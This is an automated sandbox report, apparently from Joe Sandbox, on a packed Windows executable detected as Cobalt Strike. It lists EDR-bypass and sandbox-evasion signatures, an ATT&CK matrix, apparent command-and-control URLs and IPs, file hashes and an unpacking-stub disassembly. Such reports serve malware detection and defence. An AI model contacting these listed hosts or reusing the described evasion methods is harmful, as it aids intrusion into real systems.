Source: 31#U544a.exe, 00000000.00000003.1690687457.000001912B04A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B048000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A7A1D00 rdtsc

0_2_00007FF71A7A1D00

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_00007FF71A7A1190 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,

0_2_00007FF71A7A1190

Source: C:\Users\user\Desktop\31#U544a.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\31#U544a.exe	NtCreateFile: Indirect: 0x7FF71A7D41CB			Jump to behavior
Source: C:\Users\user\Desktop\31#U544a.exe	NtDeviceIoControlFile: Indirect: 0x7FF71A7D3BC3			Jump to behavior

Source: C:\Users\user\Desktop\31#U544a.exe

Code function: 0_2_000001912B785368 GetUserNameA,strrchr,_snprintf,

0_2_000001912B785368

Source: C:\Users\user\Desktop\31#U544a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Remote Access Functionality

Yara detected CobaltStrike

Source: Yara match	File source: 00000000.00000003.1690951119.000001912B270000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2905242341.000001912B670000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2905522054.000001912B7A1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31#U544a.exe PID: 6260, type: MEMORYSTR

Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A8209AE bind,		0_2_00007FF71A8209AE
Source: C:\Users\user\Desktop\31#U544a.exe	Code function: 0_2_00007FF71A820507 WSASocketW,WSAGetLastError,WSASocketW,SetHandleInformation,GetLastError,bind,WSAGetLastError,closesocket,WSAGetLastError,		0_2_00007FF71A820507

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	13 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Software Packing	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
31#U544a.exe	13%	ReversingLabs
31#U544a.exe	27%	Virustotal		Browse
31#U544a.exe	100%	Avira	HEUR/AGEN.1324414
31#U544a.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://code.liveapi.com/	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json#y	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json-x	0%	Avira URL Cloud	safe
http://code.liveapi.com/y	0%	Avira URL Cloud	safe
http://code.liveapi.com/.	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonF	0%	Avira URL Cloud	safe
http://stream.liveapi.com/	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/y	0%	Avira URL Cloud	safe
http://code.liveapi.com/gzip	0%	Avira URL Cloud	safe
http://code.liveapi.com/d06	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonsy	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json7y	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonP	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/l	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/dll	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonyy	0%	Avira URL Cloud	safe
202.175.7.146	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/;q=0.8	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonorientation?	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonr	0%	Avira URL Cloud	safe
https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json;(	0%	Avira URL Cloud	safe
https://202.175.7.146:10203/ll	0%	Avira URL Cloud	safe
http://crl.mZ6/	0%	Avira URL Cloud	safe
https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
leganse.oss-cn-hangzhou.aliyuncs.com	118.31.219.225	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
202.175.7.146	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json#y	31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://code.liveapi.com/y	31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://code.liveapi.com/	31#U544a.exe, 00000000.00000003.1953586887.000001912B6C5000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://code.liveapi.com/d06	31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/y	31#U544a.exe, 00000000.00000003.1746035165.000001912B061000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://code.liveapi.com/.	31#U544a.exe, 00000000.00000002.2904739603.000001912B106000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://stream.liveapi.com/	31#U544a.exe, 00000000.00000002.2904739603.000001912B02C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://code.liveapi.com/gzip	31#U544a.exe, 00000000.00000003.1953841512.000001912B0FB000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000002.2905242341.000001912B6E8000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonF	31#U544a.exe, 00000000.00000003.1883833961.000001912B09D000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B09C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json-x	31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonsy	31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json7y	31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.json	31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1746035165.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B048000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/	31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/l	31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonP	31#U544a.exe, 00000000.00000003.1746035165.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonyy	31#U544a.exe, 00000000.00000002.2904739603.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1953628567.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1878032408.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B0F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/;q=0.8	31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/dll	31#U544a.exe, 00000000.00000003.1878032408.000001912B106000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1883833961.000001912B106000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json;(	31#U544a.exe, 00000000.00000003.1690727037.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonorientation?	31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/ll	31#U544a.exe, 00000000.00000003.1953628567.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://202.175.7.146:10203/bfs/svg-next/BDC/playdata_square_line/v1.jsonr	31#U544a.exe, 00000000.00000002.2904739603.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/DosX-dev/UPX-Patcher	31#U544a.exe	false		high
https://leganse.oss-cn-hangzhou.aliyuncs.com/update.json	31#U544a.exe, 00000000.00000002.2905951421.00007FF71A7A1000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mZ6/	31#U544a.exe, 00000000.00000003.1690676459.000001912B0B7000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690624284.000001912B09A000.00000004.00000020.00020000.00000000.sdmp, 31#U544a.exe, 00000000.00000003.1690360896.000001912B09A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
202.175.7.146	unknown	Macau		4609	CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMO	true
118.31.219.225	leganse.oss-cn-hangzhou.aliyuncs.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1568880
Start date and time:	2024-12-05 05:29:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	31#U544a.exe renamed because original name is a hash value
Original Sample Name:	CEAP.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 58 Number of non-executed functions: 61
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 93.184.221.240
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
23:30:04	API Interceptor	68x Sleep call for process: 31#U544a.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	UhEi3Rge75.exe	Get hash	malicious	Unknown	Browse	123.60.37.61
	m68k.elf	Get hash	malicious	Mirai	Browse	8.152.225.233
	teste.sh4.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	8.188.217.61
	teste.x86_64.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	8.171.83.89
	teste.i686.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	118.31.17.247
	teste.mips.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	8.144.123.166
	teste.mpsl.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	121.197.47.171
	shell.elf	Get hash	malicious	Unknown	Browse	39.102.210.162
	teste.arm.elf	Get hash	malicious	Gafgyt, Mirai, Moobot, Okiru	Browse	8.138.48.156
	xd.mips.elf	Get hash	malicious	Mirai	Browse	223.7.99.35
CTM-MOCompanhiadeTelecomunicacoesdeMacauSARLMO	sora.sh4.elf	Get hash	malicious	Mirai	Browse	96.7.114.141
	la.bot.sh4.elf	Get hash	malicious	Mirai	Browse	60.246.95.89
	mips.elf	Get hash	malicious	Unknown	Browse	60.246.156.118
	arm.elf	Get hash	malicious	Mirai	Browse	113.52.88.76
	apep.sh4.elf	Get hash	malicious	Mirai	Browse	202.175.82.210
	http://202.175.83.249:5603/ws	Get hash	malicious	Unknown	Browse	202.175.83.249
	botx.x86.elf	Get hash	malicious	Mirai	Browse	113.52.88.93
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	113.52.88.64
	byte.mips.elf	Get hash	malicious	Mirai, Okiru	Browse	182.93.8.190
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	202.175.124.140

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	R7bv9d6gTH.dll	Get hash	malicious	Unknown	Browse	118.31.219.225
	Patch.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	118.31.219.225
	RuntimeBroker.exe	Get hash	malicious	PureLog Stealer, XWorm	Browse	118.31.219.225
	Qsgtknmtt.exe	Get hash	malicious	Unknown	Browse	118.31.219.225
	Fzcaaz.exe	Get hash	malicious	Unknown	Browse	118.31.219.225
	Ekyrfzxogk.exe	Get hash	malicious	Unknown	Browse	118.31.219.225
	EHak.exe	Get hash	malicious	Unknown	Browse	118.31.219.225
	Qsgtknmtt.exe	Get hash	malicious	Unknown	Browse	118.31.219.225
	Fzcaaz.exe	Get hash	malicious	Unknown	Browse	118.31.219.225
	Ekyrfzxogk.exe	Get hash	malicious	Unknown	Browse	118.31.219.225

Process:	C:\Users\user\Desktop\31#U544a.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\31#U544a.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.150184159866505
Encrypted:	false
SSDEEP:	6:kK5+E/99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7kDnLNkPlE99SNxAhUe/3
MD5:	393E59913911675E6C52C5E6941F58C6
SHA1:	DFC06F6B103121C1A94D00794B86E0B48C86B545
SHA-256:	B4A933BB6326516BCE077D51CE1BA4DEBDACB0BE01E5E98A284B73A34874707D
SHA-512:	D05765A0559DD8272ED77FA1BF6DBD66BC771CF671BC386D7EC7D7F5629B54DC5F69F06F8A73F8CF4708E5B212AEA11F7B2B77136F15D0AC842640754A81748E
Malicious:	false
Reputation:	low
Preview:	p...... .........H.Z.F..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.726439725283899
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	31#U544a.exe
File size:	604'672 bytes
MD5:	7d6748d103f78d1a8ddab5646c5cb1a3
SHA1:	744a3590531665487bf22bc7df7b45663a30790f
SHA256:	8ac3f3a5bd3ba1cb8490cf1c69c364a39feac66ee084cf218f3dd11e9be3ac92
SHA512:	f701291cc808db5f2cfb756d7d4e1ec45ddf416b3ea0e2791bf516d544c51c73091bc11aa13aa605cdef3eb5589de06f7c27723af3d92bbe11b60b57d5e58116
SSDEEP:	12288:LkSJ9QlQees48K16BqxLARYHBKbkHZchG3tggAWvg0w7K4OwThyy:wDmqIMGH+kj3CgA50wNthyy
TLSH:	D6D423A7B387501AD5D0DE75E42BE4F958193C3D280C9EEA30C92D37A2D1A58CA850BF
File Content Preview:	MZ......................@...............................................!..L.!https://github.com/DosX-dev/UPX-Patcher...$.......PE..d...@.Og...............&.......................@..........................................`... ............................

File Icon


Icon Hash:	3144bb9595dda5a2

Static PE Info

General

Entrypoint:	0x1401416c0
Entrypoint Section:	.fish
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x674FC340 [Wed Dec 4 02:49:36 2024 UTC]
TLS Callbacks:	0x4014195b, 0x1
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	dc9212f457632d496b253cd0ecc2dd4d

Entrypoint Preview

Instruction
push ebx
push esi
push edi
push ebp
dec eax
lea esi, dword ptr [FFF7895Ah]
dec eax
lea edi, dword ptr [esi-000B9025h]
dec eax
lea eax, dword ptr [edi+0012B16Ch]
push dword ptr [eax]
mov dword ptr [eax], 254B0A9Ah
push eax
push edi
xor ebx, ebx
xor ecx, ecx
dec eax
or ebp, FFFFFFFFh
call 00007F8BC1443975h
add ebx, ebx
je 00007F8BC1443924h
rep ret
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
rep ret
dec eax
lea eax, dword ptr [edi+ebp]
cmp ecx, 05h
mov dl, byte ptr [eax]
jbe 00007F8BC1443943h
dec eax
cmp ebp, FFFFFFFCh
jnbe 00007F8BC144393Dh
sub ecx, 04h
mov edx, dword ptr [eax]
dec eax
add eax, 04h
sub ecx, 04h
mov dword ptr [edi], edx
dec eax
lea edi, dword ptr [edi+04h]
jnc 00007F8BC1443911h
add ecx, 04h
mov dl, byte ptr [eax]
je 00007F8BC1443932h
dec eax
inc eax
mov byte ptr [edi], dl
sub ecx, 01h
mov dl, byte ptr [eax]
dec eax
lea edi, dword ptr [edi+01h]
jne 00007F8BC1443912h
rep ret
cld
inc ecx
pop ebx
jmp 00007F8BC144392Ah
dec eax
inc esi
mov byte ptr [edi], dl
dec eax
inc edi
mov dl, byte ptr [esi]
add ebx, ebx
jne 00007F8BC144392Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jc 00007F8BC1443908h
lea eax, dword ptr [ecx+01h]
jmp 00007F8BC1443929h
dec eax
inc ecx
call ebx
adc eax, eax
inc ecx
call ebx
adc eax, eax
add ebx, ebx
jne 00007F8BC144392Ch
mov ebx, dword ptr [esi]
dec eax
sub esi, FFFFFFFCh
adc ebx, ebx
mov dl, byte ptr [esi]
jnc 00007F8BC1443906h
sub eax, 03h
jc 00007F8BC144393Bh
shl eax, 08h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14d9c4	0x29c	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x142000	0xb9c4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x11d000	0x62d0	.fish
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14dc60	0x14	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x141988	0x28	.fish
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.dosx	0x1000	0xb9000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.fish	0xba000	0x88000	0x87a00	f0f9493292be0a56c7515fbd2d072cb4	False	0.9674881192396313	data	7.90743698825191	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
